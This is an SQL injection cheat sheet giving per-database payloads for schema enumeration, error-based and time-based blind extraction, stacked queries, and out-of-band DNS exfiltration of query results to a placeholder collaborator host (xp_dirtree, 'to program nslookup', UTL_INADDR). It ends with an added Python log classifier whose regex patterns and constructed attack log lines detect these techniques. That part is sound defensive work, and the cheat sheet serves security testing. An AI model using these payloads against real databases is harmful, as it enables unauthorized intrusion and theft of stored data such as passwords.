# 🧨 SQL Injection Cheat Sheet
This cheat sheet collects useful syntax that you can use when performing **SQL injection** attacks for a range of common tasks during security testing.
---
## 🔗 String Concatenation
| DBMS | Syntax |
|--------------|--------------------------------------------|
| Oracle | `'foo'||'bar'` |
| Microsoft | `'foo'+'bar'` |
| PostgreSQL | `'foo'||'bar'` |
| MySQL | `'foo' 'bar'` *(note: a space between the two quoted strings)*<br>`CONCAT('foo','bar')` |
---
## 🔎 Substring (extracting parts of strings)
Extracts part of a string starting at a given offset (positions are 1-based, so offset 4 of `foobar` is `b`):
| DBMS | Syntax | Result |
|--------------|------------------------------------|------------------|
| Oracle | `SUBSTR('foobar', 4, 2)` | `ba` |
| Microsoft | `SUBSTRING('foobar', 4, 2)` | `ba` |
| PostgreSQL | `SUBSTRING('foobar', 4, 2)` | `ba` |
| MySQL | `SUBSTRING('foobar', 4, 2)` | `ba` |
---
## 💬 SQL Comments
| DBMS | Comment syntax |
|--------------|----------------------------------------------|
| Oracle | `--comment` |
| Microsoft | `--comment`, `/*comment*/` |
| PostgreSQL | `--comment`, `/*comment*/` |
| MySQL | `#comment`, `-- comment`, `/*comment*/` |
---
## 🛠️ Get the Database Version
| DBMS | SQL query |
|--------------|------------------------------------------------|
| Oracle | `SELECT banner FROM v$version`<br>`SELECT version FROM v$instance` |
| Microsoft | `SELECT @@version` |
| PostgreSQL | `SELECT version()` |
| MySQL | `SELECT @@version` |
---
## 📦 Database Contents
| DBMS | List tables and columns |
|--------------|---------------------------------------------------------------|
| Oracle | `SELECT * FROM all_tables`<br>`SELECT * FROM all_tab_columns WHERE table_name = 'TABLE'` |
| Microsoft | `SELECT * FROM information_schema.tables`<br>`SELECT * FROM information_schema.columns WHERE table_name = 'TABLE'` |
| PostgreSQL | `SELECT * FROM information_schema.tables`<br>`SELECT * FROM information_schema.columns WHERE table_name = 'TABLE'` |
| MySQL | `SELECT * FROM information_schema.tables`<br>`SELECT * FROM information_schema.columns WHERE table_name = 'TABLE'` |
---
## ❗ Conditional Errors
| DBMS | Conditional syntax that raises an error |
|--------------|---------------------------------------------------------------|
| Oracle | `SELECT CASE WHEN (CONDITION) THEN TO_CHAR(1/0) ELSE NULL END FROM dual` |
| Microsoft | `SELECT CASE WHEN (CONDITION) THEN 1/0 ELSE NULL END` |
| PostgreSQL | `1 = (SELECT CASE WHEN (CONDITION) THEN 1/(SELECT 0) ELSE NULL END)` |
| MySQL | `SELECT IF(CONDITION,(SELECT table_name FROM information_schema.tables),'a')` |
---
## 🧪 Data Exfiltration via Errors
| DBMS | Query that leaks data through the error message |
|--------------|----------------------------------------------------------------|
| Microsoft | `SELECT 'foo' WHERE 1 = (SELECT 'secret')`<br>➤ *Conversion failed...* |
| PostgreSQL | `SELECT CAST((SELECT password FROM users LIMIT 1) AS int)`<br>➤ *invalid input syntax...* |
| MySQL | `SELECT 'foo' WHERE 1=1 AND EXTRACTVALUE(1, CONCAT(0x5c, (SELECT 'secret')))`<br>➤ *XPATH syntax error...* |
---
## 🧱 Batched (Stacked) Queries
| DBMS | Support for multiple statements |
|--------------|----------------------------------------------------------------|
| Oracle | ❌ Not supported |
| Microsoft | `QUERY1; QUERY2` |
| PostgreSQL | `QUERY1; QUERY2` |
| MySQL | `QUERY1; QUERY2` *(may require specific client APIs in PHP/Python)* |
---
## ⏱️ Time Delays
| DBMS | Unconditional delay syntax (10 s) |
|--------------|-----------------------------------------------------------------|
| Oracle | `dbms_pipe.receive_message(('a'),10)` |
| Microsoft | `WAITFOR DELAY '0:0:10'` |
| PostgreSQL | `SELECT pg_sleep(10)` |
| MySQL | `SELECT SLEEP(10)` |
---
## ⏳ Conditional Delays
| DBMS | Delay only when the condition holds |
|--------------|-----------------------------------------------------------------|
| Oracle | `SELECT CASE WHEN (COND) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual` |
| Microsoft | `IF (COND) WAITFOR DELAY '0:0:10'` |
| PostgreSQL | `SELECT CASE WHEN (COND) THEN pg_sleep(10) ELSE pg_sleep(0) END` |
| MySQL | `SELECT IF(COND,SLEEP(10),'a')` |
---
## 🌍 DNS Lookup (with Burp Collaborator)
| DBMS | DNS lookup for out-of-band detection |
|--------------|-----------------------------------------------------------------|
| Oracle | `SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://BURP-COLLABORATOR/"> %remote;]>'),'/l') FROM dual`<br>or<br>`SELECT UTL_INADDR.get_host_address('BURP-COLLABORATOR')` |
| Microsoft | `exec master..xp_dirtree '//BURP-COLLABORATOR/a'` |
| PostgreSQL | `copy (SELECT '') to program 'nslookup BURP-COLLABORATOR'` |
| MySQL | `LOAD_FILE('\\\\BURP-COLLABORATOR\\a')`<br>`SELECT ... INTO OUTFILE '\\\\BURP-COLLABORATOR\\a'` *(Windows only)* |
---
## DNS Exfiltration with Data
| DBMS | DNS lookup carrying query results |
|--------------|-----------------------------------------------------------------|
| Oracle | `SELECT EXTRACTVALUE(xmltype('<?xml version="1.0"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT YOUR_QUERY)||'.BURP-COLLABORATOR/"> %remote;]>'),'/l') FROM dual` |
| Microsoft | `DECLARE @p VARCHAR(1024); SET @p=(SELECT YOUR_QUERY); EXEC('master..xp_dirtree "//'+@p+'.BURP-COLLABORATOR/a"')` |
| PostgreSQL | `CREATE OR REPLACE FUNCTION f() RETURNS void AS $$ DECLARE c TEXT; p TEXT; BEGIN SELECT INTO p (SELECT YOUR_QUERY); c := 'copy (SELECT '''') to program ''nslookup '||p||'.BURP-COLLABORATOR'''; EXECUTE c; END; $$ LANGUAGE plpgsql SECURITY DEFINER;`<br>`SELECT f();` |
| MySQL | `SELECT YOUR_QUERY INTO OUTFILE '\\\\BURP-COLLABORATOR\\a'` *(Windows only)* |
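Every table above is also a detection opportunity: the functions and keywords the cheat sheet lists (`SLEEP`, `pg_sleep`, `WAITFOR DELAY`, `dbms_pipe.receive_message`, `EXTRACTVALUE`, `information_schema`, `xp_dirtree`, `UTL_INADDR`, `to program`, `INTO OUTFILE`, `LOAD_FILE`, stacked `;`) rarely appear in legitimate request parameters. The following is an added example, not part of the original cheat sheet: a small Python classifier that URL-decodes each access-log line and tags it with the technique families from the sections above. The log lines are constructed for this example, the category names are my own labels, and `example.invalid` stands in for a collaborator host.

```python
import re
from urllib.parse import unquote_plus

# Signatures are taken from the cheat sheet's own tables; the category names
# used as keys are labels chosen for this example.
SIGNATURES = {
    "time-delay": re.compile(
        r"\b(?:sleep|pg_sleep)\s*\(|waitfor\s+delay|dbms_pipe\.receive_message", re.I),
    "error-based": re.compile(
        r"extractvalue\s*\(|\bcast\s*\(.*\bas\s+int\b|\b1\s*/\s*(?:0\b|\(\s*select\s+0\s*\))", re.I),
    "schema-enum": re.compile(
        r"information_schema\.(?:tables|columns)|\ball_tab(?:les|_columns)\b|v\$(?:version|instance)", re.I),
    "out-of-band": re.compile(
        r"xp_dirtree|utl_inaddr|\bto\s+program\b|into\s+outfile|load_file\s*\(", re.I),
    "stacked": re.compile(
        r";\s*(?:select|insert|update|delete|exec|copy|declare|create)\b", re.I),
}

# Constructed access-log lines (client, method, request target, status) in the
# URL-encoded form a web server records them; none are from a real system.
LOG_LINES = [
    "10.0.0.5 GET /items?cat=3 200",
    "10.0.0.7 GET /items?cat=3'+AND+1=(SELECT+CASE+WHEN+(1=1)+THEN+1/(SELECT+0)+ELSE+NULL+END)-- 500",
    "10.0.0.7 GET /items?cat=3';+SELECT+SLEEP(10)-- 200",
    "10.0.0.9 GET /items?cat=3'+AND+EXTRACTVALUE(1,CONCAT(0x5c,(SELECT+'x')))-- 500",
    "10.0.0.9 GET /items?cat=3';+exec+master..xp_dirtree+'//example.invalid/a'-- 200",
    "10.0.0.11 GET /items?cat=1%27%20AND%20pg_sleep(10)-- 200",
    "10.0.0.12 GET /search?q=information_schema.columns 200",
]

def classify(line):
    """Return the sorted list of signature categories that fire on one line.
    The line is URL-decoded first so percent- and plus-encoded payloads
    match the same patterns as plain ones."""
    decoded = unquote_plus(line)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))

def scan(lines):
    """Return (line_number, categories) for every line that hit at least one
    signature; line numbers are 1-based, as most log viewers show them."""
    hits = []
    for number, line in enumerate(lines, start=1):
        categories = classify(line)
        if categories:
            hits.append((number, categories))
    return hits

if __name__ == "__main__":
    for number, categories in scan(LOG_LINES):
        print(f"line {number}: {', '.join(categories)}")
```

The last constructed line, a search for `information_schema.columns`, is flagged as schema enumeration even though it may be a user looking up documentation, which is why output like this belongs in a triage queue rather than a blocking rule: correlate hits by client address and by 5xx responses (the error-based lines above return 500) before raising an alert. The single `unquote_plus` pass handles one level of encoding; double-encoded parameters need a second decode before matching.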